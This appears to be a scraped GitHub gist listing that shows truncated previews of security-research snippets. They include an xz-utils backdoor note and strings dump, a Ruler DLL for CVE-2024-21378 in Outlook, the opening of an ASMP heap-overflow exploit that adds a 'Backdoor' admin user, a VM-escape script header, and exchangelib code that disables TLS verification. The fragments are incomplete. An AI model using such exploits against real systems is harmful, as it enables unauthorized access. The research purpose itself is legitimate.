On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0810 b' from ' | |
0678 b' ssh2' | |
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00' | |
0708 b'%s' | |
0108 b'/usr/sbin/sshd\x00' | |
0870 b'Accepted password for ' | |
01a0 b'Accepted publickey for ' | |
0c40 b'BN_bin2bn\x00' | |
06d0 b'BN_bn2bin\x00' | |
0958 b'BN_dup\x00' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket, struct, sys | |
p32 = lambda x: struct.pack(">I", x) | |
p16 = lambda x: struct.pack(">h", x) | |
p8 = lambda x: struct.pack(">b", x) | |
# ASMP heap overflow exploit creates new applianceAdmin user | |
def exploit(hostname, username="Backdoor", password="Backdoor"): | |
global socks # python closes out of scope sockets | |
port = 3211 # port is hardcoded in the binary | |
usernm = username.encode() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl | |
import sys | |
import time | |
import getopt | |
import socket | |
''' | |
Gives the hexadecimal representation of "command" |
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python -u | |
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty | |
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW | |
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter | |
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Why do compilers even bother with exploiting undefinedness signed overflow? And what are those | |
mysterious cases where it helps? | |
A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but | |
I think it's useful to know what compiler writers are accomplishing by this. | |
TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all | |
major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some | |
fairly common cases. The signed overflow UB exploitation is an attempt to work around this. |
NewerOlder